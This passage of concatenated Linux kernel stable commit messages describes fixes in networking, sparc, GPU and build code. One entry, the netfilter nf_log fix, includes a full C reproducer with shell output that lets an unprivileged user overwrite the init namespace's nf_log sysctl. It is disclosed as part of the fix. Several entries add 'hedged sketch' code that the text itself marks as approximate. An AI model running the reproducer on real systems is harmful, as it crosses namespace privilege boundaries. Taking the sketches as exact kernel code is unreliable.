Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a236441bb6 ]
Just like the non-cross-call TLB flush handlers, the cross-call ones need
to avoid doing PC-relative branches outside of their code blocks.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit b429ae4d5b ]
When we copy code over to patch another piece of code, we can only use
PC-relative branches that target code within that piece of code.
Such PC-relative branches cannot be made to external symbols because
the patch moves the location of the code and thus modifies the
relative address of external symbols.
Use an absolute jmpl to fix this problem.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 849c498766 ]
If the number of pages we are flushing is more than twice the number
of entries in the TSB, just scan the TSB table for matches rather
than probing each and every page in the range.
Based upon a patch and report by James Clarke.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9d9fa23020 ]
Additionally, if the offset will overflow the immediate for a ba,pt
instruction, fall back on a standard ba to get an extra 3 bits.
Signed-off-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8736f8022e upstream.
spidev.h uses _IOC_SIZEBITS directly. musl libc does not provide this macro
unless linux/ioctl.h is included explicitly. Fixes build failures like:
In file included from .../host/usr/arm-buildroot-linux-musleabihf/sysroot/usr/include/sys/ioctl.h:7:0,
from .../build/spidev_test-v3.15/spidev_test.c:20:
.../build/spidev_test-v3.15/spidev_test.c: In function ‘transfer’:
.../build/spidev_test-v3.15/spidev_test.c:75:18: error: ‘_IOC_SIZEBITS’ undeclared (first use in this function)
ret = ioctl(fd, SPI_IOC_MESSAGE(1), &tr);
^
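The fix is just an explicit include ahead of the spidev header:
  #include <linux/ioctl.h>        /* _IOC_SIZEBITS, used by SPI_IOC_MESSAGE() */
  #include <linux/spi/spidev.h>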
Signed-off-by: Baruch Siach <baruch@tkos.co.il>
Signed-off-by: Mark Brown <broonie@kernel.org>
Cc: Ralph Sennhauser <ralph.sennhauser@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit c51e424dc7 ]
Commit 52f95bbfcf ("stmmac: fix adjust link call in case of a switch
is attached") added some logic to avoid polling the fixed PHY and
therefore invoking the adjust_link callback more than once, since this
is a fixed PHY and link events won't be generated.
This works fine the first time, because we start with phydev->irq =
PHY_POLL, so we call adjust_link, then we set phydev->irq =
PHY_IGNORE_INTERRUPT and we stop polling the PHY.
Now, if we called ndo_close(), which calls both phy_stop() and does an
explicit netif_carrier_off(), we end up with a link down. Upon calling
ndo_open() again, despite starting the PHY state machine, we have
PHY_IGNORE_INTERRUPT set, and we generate no link event at all, so the
link is permanently down.
Fixes: 52f95bbfcf ("stmmac: fix adjust link call in case of a switch is attached")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Acked-by: Giuseppe Cavallaro <peppe.cavallaro@st.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 5bf35ddfee ]
Now when users shut down a sock with SEND_SHUTDOWN in sctp, even if
this sock has no connection (assoc), the sk state would be changed to
SCTP_SS_CLOSING, which is not what we expect.
Besides, after that, if users try to listen on this sock, the kernel
could even panic when it dereferences sctp_sk(sk)->bind_hash in
sctp_inet_listen, as bind_hash is null when the sock has no assoc.
This patch moves the sk state change after checking that sk assocs
is not empty, and also merges the two if() conditions and reduces
the indent level.
Fixes: d46e416c11 ("sctp: sctp should change socket state when shutdown is received")
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 6df77862f6 ]
In-flight DMA from the 1st kernel could continue going in the kdump kernel.
A new IO page table has been created before bnx2 does its reset at the open
stage. We have to wait for the in-flight DMA to complete to avoid it looking
up the newly created IO page table at the probe stage.
Suggested-by: Michael Chan <michael.chan@broadcom.com>
Signed-off-by: Baoquan He <bhe@redhat.com>
Acked-by: Michael Chan <michael.chan@broadcom.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 5d0d4b91bf ]
This reverts commit 3e1be7ad2d.
When people build the bnx2 driver into the kernel, it will fail to detect
and load firmware because the firmware is contained in the initramfs and
the initramfs has not been uncompressed yet during do_initcalls. So
revert commit 3e1be7a and work out a new way in the later patch.
Signed-off-by: Baoquan He <bhe@redhat.com>
Acked-by: Paul Menzel <pmenzel@molgen.mpg.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 42cdb338f4 ]
The device's neighbour table is periodically dumped in order to update
the kernel about active neighbours. A single dump session may span
multiple queries, until the response carries less records than requested
or when a record (can contain up to four neighbour entries) is not full.
Current code stops the session when the number of returned records is
zero, which can result in infinite loop in case of high packet rate.
Fix this by stopping the session according to the above logic.
Fixes: c723c735fa ("mlxsw: spectrum_router: Periodically update the kernel's neigh table")
Signed-off-by: Arkadi Sharshevsky <arkadis@mellanox.com>
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 2d644d4c75 ]
When binding a port to a newly created span entry, its refcount is
initialized to zero even though it has a bound port. That leads
to unexpected behaviour when the user tries to delete that port
from the span entry.
Fix this by initializing the reference count to 1.
Also add a warning to the put function.
Fixes: 763b4b70af ("mlxsw: spectrum: Add support in matchall mirror TC offloading")
Signed-off-by: Yotam Gigi <yotamg@mellanox.com>
Reviewed-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7b5b74efcc ]
This reverts commit cf00713a65 ("include/uapi/linux/atm_zatm.h: include
linux/time.h").
This attempted to fix userspace breakage that no longer existed when
the patch was merged. Almost one year earlier, commit 70ba07b675
("atm: remove 'struct zatm_t_hist'") deleted the struct in question.
After this patch was merged, we now have to deal with people being
unable to include this header in conjunction with standard C library
headers like stdlib.h (which linux-atm does). Example breakage:
x86_64-pc-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I../.. -I./../q2931 -I./../saal \
-I. -DCPPFLAGS_TEST -I../../src/include -O2 -march=native -pipe -g \
-frecord-gcc-switches -freport-bug -Wimplicit-function-declaration \
-Wnonnull -Wstrict-aliasing -Wparentheses -Warray-bounds \
-Wfree-nonheap-object -Wreturn-local-addr -fno-strict-aliasing -Wall \
-Wshadow -Wpointer-arith -Wwrite-strings -Wstrict-prototypes -c zntune.c
In file included from /usr/include/linux/atm_zatm.h:17:0,
from zntune.c:17:
/usr/include/linux/time.h:9:8: error: redefinition of ‘struct timespec’
struct timespec {
^
In file included from /usr/include/sys/select.h:43:0,
from /usr/include/sys/types.h:219,
from /usr/include/stdlib.h:314,
from zntune.c:9:
/usr/include/time.h:120:8: note: originally defined here
struct timespec
^
Signed-off-by: Mike Frysinger <vapier@gentoo.org>
Acked-by: Mikko Rapeli <mikko.rapeli@iki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ac6e780070 ]
With syzkaller help, Marco Grassi found a bug in TCP stack,
crashing in tcp_collapse()
Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.
We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq
Many thanks to syzkaller team and Marco for giving us a reproducer.
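A hedged sketch of the approach (helper and call-site details assumed):
trim at most down to the TCP header, and let callers resync end_seq from
whatever length is left.
int tcp_filter(struct sock *sk, struct sk_buff *skb)
{
        struct tcphdr *th = (struct tcphdr *)skb->data;

        /* Never allow a socket filter to trim into the TCP header itself. */
        return sk_filter_trim_cap(sk, skb, th->doff * 4);
}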
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Marco Grassi <marco.gra@gmail.com>
Reported-by: Vladis Dronov <vdronov@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 969447f226 ]
In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().
After commit 5943634fc5 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never get resolved and the traffic is blackholed.
So, use the new_gw for neigh lookup.
Changes from v1:
- use __ipv4_neigh_lookup instead (per Eric Dumazet).
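A hedged one-line sketch of the lookup change (surrounding code in the
redirect handler assumed): key the neighbour lookup on the redirect
target instead of the old gateway.
n = __ipv4_neigh_lookup(rt->dst.dev, new_gw);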
Fixes: 5943634fc5 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 34fad54c25 ]
After Tom's patch, the thoff field could point past the end of the buffer,
which could fool some callers.
If an skb was provided, skb->len should be the upper limit.
If not, hlen is supposed to be the upper limit.
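A hedged sketch of the clamp (field and variable names as described
above; exit-path placement assumed):
key_control->thoff = min_t(u16, key_control->thoff,
                           skb ? skb->len : hlen);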
Fixes: a6e544b0a8 ("flow_dissector: Jump to exit code in __skb_flow_dissect")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Yibin Yang <yibyang@cisco.com>
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Acked-by: Willem de Bruijn <willemb@google.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9d1a6c4ea4 ]
icmp_send is called in response to some event. The skb may not have
the device set (skb->dev is NULL), but it is expected to have an rt.
Update icmp_route_lookup to use the rt on the skb to determine L3
domain.
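A hedged sketch of the change in icmp_route_lookup() (surrounding code
assumed):
/* Use the device behind the attached rt, not skb->dev, for the L3 domain. */
fl4->flowi4_oif = l3mdev_master_ifindex(skb_dst(skb_in)->dev);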
Fixes: 613d09b30f ("net: Use VRF device index for lookups on TX")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 3023898b7d ]
Do not send the next message in sendmmsg for partial sendmsg
invocations.
sendmmsg assumes that it can continue sending the next message
when the return value of the individual sendmsg invocations
is positive. It results in corrupting the data for TCP,
SCTP, and UNIX streams.
For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream
of "aefgh" if the first sendmsg invocation sends only the first
byte while the second sendmsg goes through.
Datagram sockets either send the entire datagram or fail, so
this patch affects only sockets of type SOCK_STREAM and
SOCK_SEQPACKET.
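A hedged sketch of the loop guard in the sendmmsg implementation
(variable names assumed): stop the batch as soon as one sendmsg()
consumed only part of its iovec.
++datagrams;
if (msg_data_left(&msg_sys))
        break;  /* partial stream send: don't corrupt the byte stream */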
Fixes: 228e548e60 ("net: Add sendmmsg socket system call")
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit fd0285a39b ]
The display of /proc/net/route has had a couple of issues due to the fact
that when I originally rewrote most of fib_trie I made it so that the
iterator was tracking the next value to use instead of the current one.
In addition it had an off by 1 error where I was tracking the first piece
of data as position 0, even though in reality that belonged to the
SEQ_START_TOKEN.
This patch updates the code so the iterator tracks the last reported
position and key instead of the next expected position and key. In
addition it shifts things so that all of the leaves start at 1 instead of
trying to report leaves starting with offset 0 as being valid. With these
two issues addressed this should resolve any off by one errors that were
present in the display of /proc/net/route.
Fixes: 25b97c016b ("ipv4: off-by-one in continuation handling in /proc/net/route")
Cc: Andy Whitcroft <apw@canonical.com>
Reported-by: Jason Baron <jbaron@akamai.com>
Tested-by: Jason Baron <jbaron@akamai.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 5d41ce29e3 ]
icmp6_send is called in response to some event. The skb may not have
the device set (skb->dev is NULL), but it is expected to have a dst set.
Update icmp6_send to use the dst on the skb to determine L3 domain.
Fixes: ca254490c8 ("net: Add VRF support to IPv6 stack")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 483bed2b0d ]
Commit a6ed3ea65d ("bpf: restore behavior of bpf_map_update_elem")
added an extra per-cpu reserve to the hash table map to restore old
behaviour from pre-prealloc times. When non-prealloc is in use for a
map, the problem is that once a hash table extra element has been
linked into the hash table and the hash table is destroyed due to its
refcount dropping to zero, htab_map_free() -> delete_all_elements()
will walk the whole hash table and drop all elements via htab_elem_free().
The element from the extra reserve is then first fed to the wrong
backend allocator and eventually freed twice.
Fixes: a6ed3ea65d ("bpf: restore behavior of bpf_map_update_elem")
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7233bc84a3 ]
sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread releases it. But Andrey
Konovalov and Dmitry Vyukov reported a use-after-free in such a
situation.
The problem is that __sctp_connect() doesn't get a ref on the asoc and
will do a read on the asoc after calling sctp_wait_for_connect(), but
by then another thread may have closed it and the _put on
sctp_wait_for_connect will actually release it, causing the
use-after-free.
The fix is, instead of doing the read after waiting for the connect, to
do it before, avoiding this issue as the socket is still locked by then.
There should be no issue in returning the asoc id in case of failure,
as the application shouldn't trust that number in such situations
anyway.
This issue doesn't exist in sctp_sendmsg() path.
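A hedged sketch of the reordering in __sctp_connect() (variable names
assumed):
/* Read the id while the socket lock still protects the asoc... */
if (assoc_id)
        *assoc_id = asoc->assoc_id;
/* ...and only then sleep; the asoc may be gone once we wake up. */
err = sctp_wait_for_connect(asoc, &timeo);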
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 1aa9d1a0e7 ]
dccp_v6_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 6706a97fec ]
dccp_v4_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.
This patch might allow processing more ICMP messages, as some routers
still limit the number of reflected bytes to 28 (RFC 792), instead of
the extended lengths (RFC 1812 4.3.2.3).
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 79d8665b95 ]
After my commit, tcp_sendmsg() might restart its loop after
processing socket backlog.
If sk_err is set, we blindly return an error, even though we
copied data to user space before.
We should instead return number of bytes that could be copied,
otherwise user space might resend data and corrupt the stream.
This might happen if another thread is using recvmsg(MSG_ERRQUEUE)
to process timestamps.
Issue was diagnosed by Soheil and Willem, big kudos to them !
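A hedged sketch of the error-path change (label layout as in
tcp_sendmsg(); details assumed):
do_error:
        if (copied + copied_syn)
                goto out;       /* report what was already copied */
out_err:
        err = sk_stream_error(sk, flags, err);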
Fixes: d41a69f1d3 ("tcp: make tcp_sendmsg() aware of socket backlog")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Cc: Soheil Hassas Yeganeh <soheil@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Tested-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9ee6c5dc81 ]
Some configurations (e.g. geneve interface with default
MTU of 1500 over an ethernet interface with 1500 MTU) result
in the transmission of packets that exceed the configured MTU.
While this should be considered to be a "bad" configuration,
it is still allowed and should not result in the sending
of packets that exceed the configured MTU.
Fix by dropping the assumption in ip_finish_output_gso() that
locally originated gso packets will never need fragmentation.
Basic testing using iperf (observing CPU usage and bandwidth) has shown
no measurable performance impact for traffic not requiring
fragmentation.
Fixes: c7ba65d7b6 ("net: ip: push gso skb forwarding handling down the stack")
Reported-by: Jan Tluka <jtluka@redhat.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ac9e70b17e ]
Imagine the initial value of max_skb_frags is 17, and the last
skb in the write queue has 15 frags.
Then max_skb_frags is lowered to 14 or smaller value.
tcp_sendmsg() will then be allowed to add additional page frags
and eventually go past MAX_SKB_FRAGS, overflowing struct
skb_shared_info.
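A hedged sketch of the kind of guard needed in the sendmsg path
(surrounding code assumed): compare with >= so an skb that already
exceeds a freshly lowered limit cannot keep gaining frags.
if (i >= sysctl_max_skb_frags) {        /* was: i == sysctl_max_skb_frags */
        tcp_mark_push(tp, skb);
        goto new_segment;
}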
Fixes: 5f74f82ea3 ("net:Add sysctl_max_skb_frags")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com>
Cc: Håkon Bugge <haakon.bugge@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 23f4ffedb7 ]
skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.
This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.
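A hedged sketch of the clear in ip6tunnel_xmit() (placement assumed,
before the packet is handed to the IPv6 output path):
memset(skb->cb, 0, sizeof(struct inet6_skb_parm));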
Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit fcdefccac9 ]
Current bgmac code initializes some DMA settings in the receive control
register for some hardware and then immediately clears those settings.
Not clearing those settings results in ~420Mbps *improvement* in
throughput; this system can now receive frames at line-rate on Broadcom
5871x hardware compared to ~520Mbps today. I also tested a few other
values but found there to be no discernible difference in CPU
utilization even if burst size and prefetching values are different.
On the hardware tested there was no need to keep the code that cleared
all but bits 16-17, but since there is a wide variety of hardware that
used this driver (I did not look at all hardware docs for hardware using
this IP block), I find it wise to move this call up and clear bits just
after reading the default value from the hardware rather than completely
removing it.
This is a good candidate for -stable >=3.14 since that is when the code
that was supposed to improve performance (but did not) was introduced.
Signed-off-by: Andy Gospodarek <gospo@broadcom.com>
Fixes: 56ceecde1f ("bgmac: initialize the DMA controller of core...")
Cc: Hauke Mehrtens <hauke@hauke-m.de>
Acked-by: Hauke Mehrtens <hauke@hauke-m.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 4f2e4ad56a ]
Sending zero checksum is ok for TCP, but not for UDP.
UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.
Simply replace such checksum by 0xffff, regardless of transport.
This error was caught on SIT tunnels, but seems generic.
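A hedged sketch of the substitution at the point where the checksum is
folded into the packet (offset and variable names assumed):
__sum16 sum = csum_fold(csum);

/* 0 means "no checksum" on the wire for UDP; transmit all-ones instead. */
*(__sum16 *)(skb->data + offset) = sum ? sum : CSUM_MANGLED_0;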
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e551c32d57 ]
At accept() time, it is possible the parent has a non-zero
sk_err_soft, left over from a prior error.
Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.
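A hedged one-line sketch (placement in the child-socket setup path
assumed):
newsk->sk_err_soft = 0; /* don't inherit the parent's stale soft error */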
Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ce6dd23329 ]
If a congestion control module doesn't provide .undo_cwnd function,
tcp_undo_cwnd_reduction() will set cwnd to
tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1);
... which makes sense for reno (it sets ssthresh to half the current cwnd),
but it makes no sense for dctcp, which sets ssthresh based on the current
congestion estimate.
This can cause severe growth of cwnd (eventually overflowing u32).
Fix this by saving last cwnd on loss and restore cwnd based on that,
similar to cubic and other algorithms.
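A hedged sketch of the .undo_cwnd approach (the loss_cwnd field stands
for state saved at loss time and is illustrative):
static u32 dctcp_cwnd_undo(struct sock *sk)
{
        const struct dctcp *ca = inet_csk_ca(sk);

        /* Restore the cwnd remembered when the loss was detected. */
        return max(tcp_sk(sk)->snd_cwnd, ca->loss_cwnd);
}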
Fixes: e3118e8359 ("net: tcp: add DCTCP congestion control algorithm")
Cc: Lawrence Brakmo <brakmo@fb.com>
Cc: Andrew Shewmaker <agshew@gmail.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dbb5918cb3 upstream.
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
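A hedged sketch of the idea (two fragments; surrounding code assumed):
/* At sysctl registration time, remember which netns this table belongs to. */
table[0].extra2 = net;

/* In nf_log_proc_dostring(), use it instead of current's namespace. */
struct net *net = table->extra2;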
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fd58753ead upstream.
Currently the display INIT power domain disabling/enabling happens in a
mismatched way in the suspend/resume_early hooks respectively. This can
leave display power wells incorrectly disabled in the resume hook if the
suspend sequence is aborted for some reason resulting in the
suspend/resume hooks getting called but the suspend_late/resume_early
hooks being skipped. In particular this change fixes "Unclaimed read
from register 0x1e1204" on BYT/BSW triggered from i915_drm_resume()->
intel_pps_unlock_regs_wa() when suspending with /sys/power/pm_test set
to devices.
Fixes: 85e9067933 ("drm/i915: disable power wells on suspend")
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: David Weinehall <david.weinehall@intel.com>
Signed-off-by: Imre Deak <imre.deak@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476358446-11621-1-git-send-email-imre.deak@intel.com
(cherry picked from commit 4c494a5769)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0f10425e81 upstream.
To free fences, call_rcu() is used, which calls amdgpu_fence_free()
after a grace period. During teardown, there is no guarantee all
callbacks have finished, so amdgpu_fence_slab may be destroyed before
all fences have been freed. If we are lucky, this results in some slab
warnings, if not, we get a crash in one of rcu threads because callback
is called after amdgpu has already been unloaded.
Fix it with a rcu_barrier().
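A hedged sketch of the teardown ordering (function placement assumed):
rcu_barrier();                          /* wait for pending call_rcu() fence frees */
kmem_cache_destroy(amdgpu_fence_slab);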
Fixes: b44135351a ("drm/amdgpu: RCU protected amdgpu_fence_release")
Acked-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 68a564006a upstream.
A bugfix introduced a harmless gcc warning in nfs4_slot_seqid_in_use
if we enable -Wmaybe-uninitialized again:
fs/nfs/nfs4session.c:203:54: error: 'cur_seq' may be used uninitialized in this function [-Werror=maybe-uninitialized]
gcc is not smart enough to conclude that the IS_ERR/PTR_ERR pair
results in a nonzero return value here. Using PTR_ERR_OR_ZERO()
instead makes this clear to the compiler.
The warning originally did not appear in v4.8 as it was globally
disabled, but the bugfix that introduced the warning got backported
